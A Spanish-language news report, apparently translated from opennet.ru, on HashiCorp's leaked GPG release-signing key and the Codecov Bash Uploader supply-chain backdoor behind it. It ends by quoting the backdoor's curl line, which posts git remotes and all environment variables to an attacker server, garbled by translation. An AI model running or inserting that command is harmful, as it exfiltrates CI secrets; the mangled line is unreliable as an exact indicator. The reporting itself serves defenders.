HashiCorp, conocida por desarrollar las herramientas de código abierto Vagrant, Packer, Nomad y Terraform, anunció la filtración de la clave GPG privada utilizada para crear firmas digitales que verifican las liberaciones. Los atacantes que obtuvieron acceso a la clave GPG podrían realizar cambios ocultos en los productos de HashiCorp verificándolos con una firma digital correcta. Al mismo tiempo, la empresa afirmó que durante la auditoría no se identificaron rastros de intentos de realizar tales modificaciones.
Actualmente, la clave GPG comprometida ha sido revocada y se ha introducido una nueva clave en su lugar. El problema afectó solo a la verificación utilizando los archivos SHA256SUM y SHA256SUM.sig, y no afectó la generación de firmas digitales para los paquetes DEB y RPM de Linux suministrados a través de releases.hashicorp.com, así como los mecanismos de verificación de versiones para macOS y Windows (AuthentiCode). .
La filtración se produjo debido al uso en la infraestructura del script Codecov Bash Uploader (codecov-bash), diseñado para descargar informes de cobertura de sistemas de integración continua. Durante el ataque a la empresa Codecov, se ocultó una puerta trasera en el script especificado, a través del cual se enviaban contraseñas y claves de cifrado al servidor de los atacantes.
Para hackear, los atacantes aprovecharon un error en el proceso de creación de la imagen Codecov Docker, lo que les permitió extraer datos de acceso a GCS (Google Cloud Storage), necesarios para realizar cambios en el script Bash Uploader distribuido desde codecov.io. sitio web. Los cambios se realizaron el 31 de enero, no fueron detectados durante dos meses y permitieron a los atacantes extraer información almacenada en los entornos del sistema de integración continua del cliente. Usando el código malicioso agregado, los atacantes podrían obtener información sobre el repositorio Git probado y todas las variables de entorno, incluidos tokens, claves de cifrado y contraseñas, transmitidas a sistemas de integración continua para organizar el acceso al código de aplicaciones, repositorios y servicios como Amazon Web Services y GitHub. .
Además de la llamada directa, el script Codecov Bash Uploader se utilizó como parte de otros cargadores, como Codecov-action (Github), Codecov-circleci-orb y Codecov-bitrise-step, cuyos usuarios también se ven afectados por el problema. Se recomienda a todos los usuarios de codecov-bash y productos relacionados auditar sus infraestructuras, así como cambiar contraseñas y claves de cifrado. Puede comprobar la presencia de una puerta trasera en un script mediante la presencia de la línea curl -sm 0.5 -d “$(git remoto -v)<<<<<< ENV $(env)” http:// /cargar/v2 || verdadero
Fuente: opennet.ru